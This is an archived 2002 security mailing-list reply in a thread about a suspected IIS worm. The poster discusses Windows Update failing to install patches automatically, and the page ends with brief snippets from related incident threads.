Re: new IIS worm? (rcp lsass.exe)

From: zeno (bugtraq@cgisecurity.net)
Date: 09/24/02

From: zeno <bugtraq@cgisecurity.net>
To: jcampbell@wsipc.org (John Campbell)
Date: Tue, 24 Sep 2002 17:07:55 -0400 (EDT)

> Windows Update from you-know-who actually does what you describe. I'd
> always been leery of it, but tried it out recently when setting up a W2K
> test server, and it performed as advertised. It did take several
> iterations to get everything updated, owing to various dependencies.

When I used windows update it downloaded the patches but didn't install them. I had to manually
go through each one. While this isn't a big deal I am looking for something 100 percent automated with
install of the patches. Perhaps I'm missing something I deal mostly with unix.

- zeno

> Regards,
>
> John Campbell, CISSP, GCWN
> Information Security Engineer
> Washington School Information Processing Cooperative
> (WSIPC)
> Everett, Washington, USA

  • RE: wu-ftpd attack ???
    ... I'll supply the results after the next attack of substantial event. ... >This list is provided by the SecurityFocus ARIS analyzer service. ... >For more information on this free incident handling, management ...
    (Incidents)
  • RE: new IIS worm? (rcp lsass.exe)
    ... Subject: new IIS worm? ... > We have seen this attack from 4 different sources since Sept. 16, ... > This list is provided by the SecurityFocus ARIS analyzer service. ... > and tracking system please see: http://aris.securityfocus.com ...
    (Incidents)
  • Re: search box defaults to about:blank
    ... this type hijack indicates an unpatched machine, ... Please visit Windows Update to avoid these exploits. ... > official, but by date searched athte time of attack, ...
  • RE: new IIS worm? (rcp lsass.exe)
    ... Subject: new IIS worm? ... > We have seen this attack from 4 different sources since Sept. 16, ... > This list is provided by the SecurityFocus ARIS analyzer service. ...
    (Incidents)
  • Re: Windows Systems Defaced
    ... server sa password. ... >were multiple source IPs involved in this attack. ... This list is provided by the SecurityFocus ARIS analyzer service. ... and tracking system please see: http://aris.securityfocus.com ...
    (Incidents)